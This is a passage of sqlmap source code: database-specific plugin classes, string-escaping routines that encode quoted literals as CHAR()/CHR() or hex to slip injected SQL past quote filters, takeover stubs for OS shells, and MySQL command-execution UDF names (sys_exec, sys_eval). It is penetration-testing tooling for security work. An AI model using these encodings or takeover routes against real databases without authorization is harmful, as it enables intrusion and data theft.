18 | class MSSQLServerMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
19 | """
20 | This class defines Microsoft SQL Server methods
21 | """
22 |
23 | def __init__(self):
24 | self.excludeDbsList = MSSQL_SYSTEM_DBS
25 |
26 | for cls in self.__class__.__bases__:
27 | cls.__init__(self)
28 |
29 | unescaper[DBMS.MSSQL] = Syntax.escape
30 |
--------------------------------------------------------------------------------
/plugins/dbms/mssqlserver/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+CHAR(101)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar"
16 | True
17 | >>> Syntax.escape(u"SELECT 'abcd\xebfgh' FROM foobar") == "SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+NCHAR(235)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar"
18 | True
19 | """
20 |
21 | def escaper(value):
22 | return "+".join("%s(%d)" % ("CHAR" if _ < 128 else "NCHAR", _) for _ in getOrds(value))
23 |
24 | return Syntax._escape(expression, quote, escaper)
25 |
--------------------------------------------------------------------------------
/plugins/dbms/mysql/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import MYSQL_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 | from plugins.dbms.mysql.enumeration import Enumeration
12 | from plugins.dbms.mysql.filesystem import Filesystem
13 | from plugins.dbms.mysql.fingerprint import Fingerprint
14 | from plugins.dbms.mysql.syntax import Syntax
15 | from plugins.dbms.mysql.takeover import Takeover
16 | from plugins.generic.misc import Miscellaneous
17 |
18 | class MySQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
19 | """
20 | This class defines MySQL methods
21 | """
22 |
23 | def __init__(self):
24 | self.excludeDbsList = MYSQL_SYSTEM_DBS
25 | self.sysUdfs = {
26 | # UDF name: UDF return data-type
27 | "sys_exec": {"return": "int"},
28 | "sys_eval": {"return": "string"},
29 | "sys_bineval": {"return": "int"}
30 | }
31 |
32 | for cls in self.__class__.__bases__:
33 | cls.__init__(self)
34 |
35 | unescaper[DBMS.MYSQL] = Syntax.escape
36 |
--------------------------------------------------------------------------------
/plugins/dbms/mysql/enumeration.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.enumeration import Enumeration as GenericEnumeration
9 |
10 | class Enumeration(GenericEnumeration):
11 | pass
12 |
--------------------------------------------------------------------------------
/plugins/dbms/mysql/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import binascii
9 |
10 | from lib.core.convert import getBytes
11 | from lib.core.convert import getOrds
12 | from lib.core.convert import getUnicode
13 | from plugins.generic.syntax import Syntax as GenericSyntax
14 |
15 | class Syntax(GenericSyntax):
16 | @staticmethod
17 | def escape(expression, quote=True):
18 | """
19 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 0x6162636465666768 FROM foobar"
20 | True
21 | >>> Syntax.escape(u"SELECT 'abcd\xebfgh' FROM foobar") == "SELECT CONVERT(0x61626364c3ab666768 USING utf8) FROM foobar"
22 | True
23 | """
24 |
25 | def escaper(value):
26 | if all(_ < 128 for _ in getOrds(value)):
27 | return "0x%s" % getUnicode(binascii.hexlify(getBytes(value)))
28 | else:
29 | return "CONVERT(0x%s USING utf8)" % getUnicode(binascii.hexlify(getBytes(value, "utf8")))
30 |
31 | return Syntax._escape(expression, quote, escaper)
32 |
--------------------------------------------------------------------------------
/plugins/dbms/oracle/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import ORACLE_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 | from plugins.dbms.oracle.enumeration import Enumeration
12 | from plugins.dbms.oracle.filesystem import Filesystem
13 | from plugins.dbms.oracle.fingerprint import Fingerprint
14 | from plugins.dbms.oracle.syntax import Syntax
15 | from plugins.dbms.oracle.takeover import Takeover
16 | from plugins.generic.misc import Miscellaneous
17 |
18 | class OracleMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
19 | """
20 | This class defines Oracle methods
21 | """
22 |
23 | def __init__(self):
24 | self.excludeDbsList = ORACLE_SYSTEM_DBS
25 |
26 | for cls in self.__class__.__bases__:
27 | cls.__init__(self)
28 |
29 | unescaper[DBMS.ORACLE] = Syntax.escape
30 |
--------------------------------------------------------------------------------
/plugins/dbms/oracle/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar"
16 | True
17 | >>> Syntax.escape(u"SELECT 'abcd\xebfgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||NCHR(235)||CHR(102)||CHR(103)||CHR(104) FROM foobar"
18 | True
19 | """
20 |
21 | def escaper(value):
22 | return "||".join("%s(%d)" % ("CHR" if _ < 128 else "NCHR", _) for _ in getOrds(value))
23 |
24 | return Syntax._escape(expression, quote, escaper)
25 |
--------------------------------------------------------------------------------
/plugins/dbms/oracle/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "Operating system command execution functionality not "
14 | errMsg += "yet implemented for Oracle"
15 | raise SqlmapUnsupportedFeatureException(errMsg)
16 |
17 | def osShell(self):
18 | errMsg = "Operating system shell functionality not yet "
19 | errMsg += "implemented for Oracle"
20 | raise SqlmapUnsupportedFeatureException(errMsg)
21 |
22 | def osPwn(self):
23 | errMsg = "Operating system out-of-band control functionality "
24 | errMsg += "not yet implemented for Oracle"
25 | raise SqlmapUnsupportedFeatureException(errMsg)
26 |
27 | def osSmb(self):
28 | errMsg = "One click operating system out-of-band control "
29 | errMsg += "functionality not yet implemented for Oracle"
30 | raise SqlmapUnsupportedFeatureException(errMsg)
31 |
--------------------------------------------------------------------------------
/plugins/dbms/postgresql/enumeration.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.data import logger
9 |
10 | from plugins.generic.enumeration import Enumeration as GenericEnumeration
11 |
12 | class Enumeration(GenericEnumeration):
13 | def getHostname(self):
14 | warnMsg = "on PostgreSQL it is not possible to enumerate the hostname"
15 | logger.warning(warnMsg)
16 |
--------------------------------------------------------------------------------
/plugins/dbms/postgresql/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | Note: PostgreSQL has a general problem with concenation operator (||) precedence (hence the parentheses enclosing)
16 | e.g. SELECT 1 WHERE 'a'!='a'||'b' will trigger error ("argument of WHERE must be type boolean, not type text")
17 |
18 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT (CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104)) FROM foobar"
19 | True
20 | """
21 |
22 | def escaper(value):
23 | return "(%s)" % "||".join("CHR(%d)" % _ for _ in getOrds(value)) # Postgres CHR() function already accepts Unicode code point of character(s)
24 |
25 | return Syntax._escape(expression, quote, escaper)
26 |
--------------------------------------------------------------------------------
/plugins/dbms/presto/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import PRESTO_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 |
12 | from plugins.dbms.presto.enumeration import Enumeration
13 | from plugins.dbms.presto.filesystem import Filesystem
14 | from plugins.dbms.presto.fingerprint import Fingerprint
15 | from plugins.dbms.presto.syntax import Syntax
16 | from plugins.dbms.presto.takeover import Takeover
17 | from plugins.generic.misc import Miscellaneous
18 |
19 | class PrestoMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
20 | """
21 | This class defines Presto methods
22 | """
23 |
24 | def __init__(self):
25 | self.excludeDbsList = PRESTO_SYSTEM_DBS
26 |
27 | for cls in self.__class__.__bases__:
28 | cls.__init__(self)
29 |
30 | unescaper[DBMS.PRESTO] = Syntax.escape
31 |
--------------------------------------------------------------------------------
/plugins/dbms/presto/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
10 |
11 | class Filesystem(GenericFilesystem):
12 | def readFile(self, remoteFile):
13 | errMsg = "on Presto it is not possible to read files"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
17 | errMsg = "on Presto it is not possible to write files"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
--------------------------------------------------------------------------------
/plugins/dbms/presto/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar"
16 | True
17 | """
18 |
19 | def escaper(value):
20 | return "||".join("CHR(%d)" % _ for _ in getOrds(value))
21 |
22 | return Syntax._escape(expression, quote, escaper)
23 |
--------------------------------------------------------------------------------
/plugins/dbms/presto/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on Presto it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on Presto it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on Presto it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on Presto it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/raima/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import RAIMA_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 | from plugins.dbms.raima.enumeration import Enumeration
12 | from plugins.dbms.raima.filesystem import Filesystem
13 | from plugins.dbms.raima.fingerprint import Fingerprint
14 | from plugins.dbms.raima.syntax import Syntax
15 | from plugins.dbms.raima.takeover import Takeover
16 | from plugins.generic.misc import Miscellaneous
17 |
18 | class RaimaMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
19 | """
20 | This class defines Raima methods
21 | """
22 |
23 | def __init__(self):
24 | self.excludeDbsList = RAIMA_SYSTEM_DBS
25 |
26 | for cls in self.__class__.__bases__:
27 | cls.__init__(self)
28 |
29 | unescaper[DBMS.RAIMA] = Syntax.escape
30 |
--------------------------------------------------------------------------------
/plugins/dbms/raima/connector.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.connector import Connector as GenericConnector
10 |
11 | class Connector(GenericConnector):
12 | def connect(self):
13 | errMsg = "on Raima Database Manager it is not (currently) possible to establish a "
14 | errMsg += "direct connection"
15 | raise SqlmapUnsupportedFeatureException(errMsg)
16 |
--------------------------------------------------------------------------------
/plugins/dbms/raima/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
10 |
11 | class Filesystem(GenericFilesystem):
12 | def readFile(self, remoteFile):
13 | errMsg = "on Raima Database Manager it is not possible to read files"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
17 | errMsg = "on Raima Database Manager it is not possible to write files"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
--------------------------------------------------------------------------------
/plugins/dbms/raima/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar"
16 | True
17 | """
18 |
19 | def escaper(value):
20 | return "||".join("CHAR(%d)" % _ for _ in getOrds(value))
21 |
22 | return Syntax._escape(expression, quote, escaper)
23 |
--------------------------------------------------------------------------------
/plugins/dbms/raima/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on Raima Database Manager it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on Raima Database Manager it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on Raima Database Manager it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on Raima Database Manager it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/sqlite/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import SQLITE_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 | from plugins.dbms.sqlite.enumeration import Enumeration
12 | from plugins.dbms.sqlite.filesystem import Filesystem
13 | from plugins.dbms.sqlite.fingerprint import Fingerprint
14 | from plugins.dbms.sqlite.syntax import Syntax
15 | from plugins.dbms.sqlite.takeover import Takeover
16 | from plugins.generic.misc import Miscellaneous
17 |
18 | class SQLiteMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
19 | """
20 | This class defines SQLite methods
21 | """
22 |
23 | def __init__(self):
24 | self.excludeDbsList = SQLITE_SYSTEM_DBS
25 |
26 | for cls in self.__class__.__bases__:
27 | cls.__init__(self)
28 |
29 | unescaper[DBMS.SQLITE] = Syntax.escape
30 |
--------------------------------------------------------------------------------
/plugins/dbms/sqlite/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
10 |
11 | class Filesystem(GenericFilesystem):
12 | def readFile(self, remoteFile):
13 | errMsg = "on SQLite it is not possible to read files"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
17 | errMsg = "on SQLite it is not possible to write files"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
--------------------------------------------------------------------------------
/plugins/dbms/sqlite/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97,98,99,100,101,102,103,104) FROM foobar"
16 | True
17 | """
18 |
19 | def escaper(value):
20 | return "CHAR(%s)" % ','.join("%d" % _ for _ in getOrds(value))
21 |
22 | return Syntax._escape(expression, quote, escaper)
23 |
--------------------------------------------------------------------------------
/plugins/dbms/sqlite/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on SQLite it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on SQLite it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on SQLite it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on SQLite it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/sybase/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import SYBASE_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 | from plugins.dbms.sybase.enumeration import Enumeration
12 | from plugins.dbms.sybase.filesystem import Filesystem
13 | from plugins.dbms.sybase.fingerprint import Fingerprint
14 | from plugins.dbms.sybase.syntax import Syntax
15 | from plugins.dbms.sybase.takeover import Takeover
16 | from plugins.generic.misc import Miscellaneous
17 |
18 | class SybaseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
19 | """
20 | This class defines Sybase methods
21 | """
22 |
23 | def __init__(self):
24 | self.excludeDbsList = SYBASE_SYSTEM_DBS
25 |
26 | for cls in self.__class__.__bases__:
27 | cls.__init__(self)
28 |
29 | unescaper[DBMS.SYBASE] = Syntax.escape
30 |
--------------------------------------------------------------------------------
/plugins/dbms/sybase/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
10 |
11 | class Filesystem(GenericFilesystem):
12 | def readFile(self, remoteFile):
13 | errMsg = "on Sybase it is not possible to read files"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
17 | errMsg = "on Sybase it is not possible to write files"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
--------------------------------------------------------------------------------
/plugins/dbms/sybase/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+CHAR(101)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar"
16 | True
17 | >>> Syntax.escape(u"SELECT 'abcd\xebfgh' FROM foobar") == "SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+TO_UNICHAR(235)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar"
18 | True
19 | """
20 |
21 | def escaper(value):
22 | return "+".join("%s(%d)" % ("CHAR" if _ < 128 else "TO_UNICHAR", _) for _ in getOrds(value))
23 |
24 | return Syntax._escape(expression, quote, escaper)
25 |
--------------------------------------------------------------------------------
/plugins/dbms/sybase/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on Sybase it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on Sybase it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on Sybase it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on Sybase it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/vertica/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
9 | from lib.core.settings import VERTICA_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 |
12 | from plugins.dbms.vertica.enumeration import Enumeration
13 | from plugins.dbms.vertica.filesystem import Filesystem
14 | from plugins.dbms.vertica.fingerprint import Fingerprint
15 | from plugins.dbms.vertica.syntax import Syntax
16 | from plugins.dbms.vertica.takeover import Takeover
17 | from plugins.generic.misc import Miscellaneous
18 |
19 | class VerticaMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
20 | """
21 | This class defines Vertica methods
22 | """
23 |
24 | def __init__(self):
25 | self.excludeDbsList = VERTICA_SYSTEM_DBS
26 |
27 | for cls in self.__class__.__bases__:
28 | cls.__init__(self)
29 |
30 | unescaper[DBMS.VERTICA] = Syntax.escape
31 |
--------------------------------------------------------------------------------
/plugins/dbms/vertica/enumeration.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.data import logger
9 | from plugins.generic.enumeration import Enumeration as GenericEnumeration
10 |
11 | class Enumeration(GenericEnumeration):
12 | def getRoles(self, *args, **kwargs):
13 | warnMsg = "on Vertica it is not possible to enumerate the user roles"
14 | logger.warning(warnMsg)
15 |
16 | return {}
17 |
--------------------------------------------------------------------------------
/plugins/dbms/vertica/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
9 |
10 | class Filesystem(GenericFilesystem):
11 | pass
12 |
--------------------------------------------------------------------------------
/plugins/dbms/vertica/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT (CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104)) FROM foobar"
16 | True
17 | """
18 |
19 | def escaper(value):
20 | return "(%s)" % "||".join("CHR(%d)" % _ for _ in getOrds(value))
21 |
22 | return Syntax._escape(expression, quote, escaper)
23 |
--------------------------------------------------------------------------------
/plugins/dbms/vertica/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on Vertica it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on Vertica it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on Vertica it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on Vertica it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/dbms/virtuoso/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import DBMS
